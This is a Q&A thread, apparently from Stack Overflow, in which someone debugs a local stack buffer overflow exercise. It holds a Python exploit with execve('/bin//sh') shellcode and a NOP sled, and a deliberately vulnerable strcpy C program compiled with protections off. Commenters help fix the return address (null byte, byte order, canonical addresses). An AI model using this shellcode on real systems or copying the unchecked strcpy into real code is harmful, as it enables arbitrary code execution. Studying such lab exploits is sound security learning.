# Having trouble with a buffer overflow

Tags: c, buffer, x86-64, buffer-overflow, buffer-overrun

Shellcode: https://www.exploit-db.com/raw/42179

Exploit code (python):

```
sh = "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x50\x48\x31\xd2\x48\x31\xf6\x48\xbb\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x53\x54\x5f\xb0\x3b\x0f\x05"
retaddr = "\x7f\xff\xff\xff\x00\x50\xe6"
print(sh + ("A" * (120 - len(sh) - 4)) + retaddr)
```

Vulnerable code (C):

```
#include <stdio.h>
#include <string.h>
#include <stdlib.h>

int main(int argc, char *argv[]) {
    char buffer[100];

    if (argc != 2) {
        fprintf(stderr, "Usage: %s <str>\n", argv[0]);
        exit(EXIT_FAILURE);
    }

    printf("buffer is here: %p\n", &buffer);
    strcpy(buffer, argv[1]);
    printf("copied %s into buffer\n", argv[1]);
    return 0;
}
```

The virtual machine I am using is: `ubuntu-9.04-server-amd64 (2.6.28-11)`.

How I compiled the vulnerable code:

```
gcc vuln.c -U_FORTIFY_SOURCE -fno-pie -fno-stack-protector -fno-omit-frame-pointer -ggdb -z execstack -o vuln
```

The problem I seem to be having is that I can't figure out how to get the `rip` register to go to the correct return address.

Output:

```
...
buffer is here: 0x7fffffffe650
...
Program received signal SIGSEGV, Segmentation fault.
0x0007ffff700e650 in ?? ()
```

Could anyone help?

Comment: Show your assembly code. 64 Addresses have to be "canonical". Means correct 48 bit addresses.

Comment: @rifkin I updated the post with the shellcode source.

Comment: mov rbx,'/bin//sh' seems dubious. I use this one in att  "movq   $0x68732f6e69622fff,%rbx; \n\t"
        "shr    $0x8, %rbx; \n\t"

Comment: Is this correct? retaddr = "\x7f\xff\xff\xff\x00\x50\xe6"

Comment: There is a nullbyte in your ret address also.

Comment: I tinkered around a bit and got control over rip. retaddr = "\x30\xe0\xff\xff\xff\x7f" written in reverse order.

Comment: `0x0007ffff700e650` is a different number from `0x7fffffffe650` .  You have a stray `00` byte in your Python `retaddr`.  Also remember that x86 is little-endian for the whole 64-bit number, not just the low 2 bytes.

Comment: @rifkin: the linked source is in NASM syntax;  `mov rbx,'/bin//sh'` is correct: NASM accepts multi-character strings as numeric literals, and doesn't mangle them, so that plus `push rbx` Just Works.  You don't need to manually encode ASCII to hex numbers or any crap like that.  To 0-terminate it, just push a zeroed register first.  (Which this fails to do, so yes there's a problem.)  And yes, shifting out some filler would work, too.

Comment: @Peter Cordes: and double slash is OK in NASM?

Comment: @rifkin: inside a single-quoted character literal, yes.  https://nasm.us/doc/nasmdoc3.html#section-3.4.3  (Or double-quoted is the same as single quotes, use whichever the string doesn't contain.  Or back-quotes allow C-style escapes).  In general (outside quotes) `//` isn't special in NASM, and would be a syntax error.  `/` is the division operator for assemble-time constants, and requires 2 operands.  So it's the same as GAS if you *don't* run your source through the C preprocessor first.

Comment: @rifkin I keep getting `0x00007ffff70050e6` with your codes. I can't seem to get rid of the `00` byte.

Comment: Hm... I don't understand that. Isn't '/bin/sh' needed by execve? With a nullbyte of course. What does NASM do with '/bin//sh'?

Comment: @maxgonz: you've got a 7 byte address in the retadr variable written in wrong order. Calculate your stringsize correctly.  Try something like this ``` print("A"*120 + retaddr) with retaddr = "\x30\xe0\xff\xff\xff\x7f" - check then if rip gets this addressvalue right

Comment: @rifkin The objdump is provided in the source. You can use that to see the translated instructions.

Comment: 400087: 48 bb 2f 62 69 6e 2f  movabs $0x68732f2f6e69622f,%rbx
 40008e: 2f 73 68  I see two slash ("2f") here - can't be right.

Comment: or it is. I tested it right now on the shell...